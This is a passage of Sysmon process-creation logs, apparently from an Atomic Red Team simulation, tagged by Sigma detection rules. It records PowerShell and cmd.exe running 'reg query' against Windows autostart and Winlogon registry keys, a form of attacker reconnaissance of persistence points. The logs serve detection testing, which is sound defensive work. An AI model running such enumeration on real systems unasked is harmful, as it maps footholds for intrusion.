(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E83B3100","ParentProcessId":2888,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010413E3100","ProcessId":5348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.176"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3682,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.180586Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3683,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.227372Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ParentProcessId":5984,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010CC423100","ProcessId":5256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3684,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.249442Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ProcessId":5016,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.284"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3685,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.304938Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ParentProcessId":5016,"ProcessGuid":"747F3D96-D87C-5D31-0000-00105B473100","ProcessId":6208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3686,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.335446Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3687,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.389557Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ParentProcessId":1680,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010E94B3100","ProcessId":3680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3688,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.413390Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ProcessId":1428,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3689,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.463556Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ParentProcessId":1428,"ProcessGuid":"747F3D96-D87C-5D31-0000-001078503100","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.493"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3690,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.497481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010B4523100","ParentProcessId":4016,"ProcessGuid":"747F3D96-D87C-5D31-0000-001006553100","ProcessId":5024,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.575"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3692,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.585243Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00103F573100","ParentProcessId":2440,"ProcessGuid":"747F3D96-D87C-5D31-0000-001080593100","ProcessId":4360,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3694,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.678107Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010CA5B3100","ParentProcessId":956,"ProcessGuid":"747F3D96-D87C-5D31-0000-00101D5E3100","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.739"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3696,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.743506Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001056603100","ParentProcessId":6832,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010A8623100","ProcessId":6436,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3698,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.807707Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E1643100","ParentProcessId":5936,"ProcessGuid":"747F3D96-D87C-5D31-0000-001033673100","ProcessId":7144,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.865"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3700,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.868916Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ProcessId":1740,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3701,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.921206Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 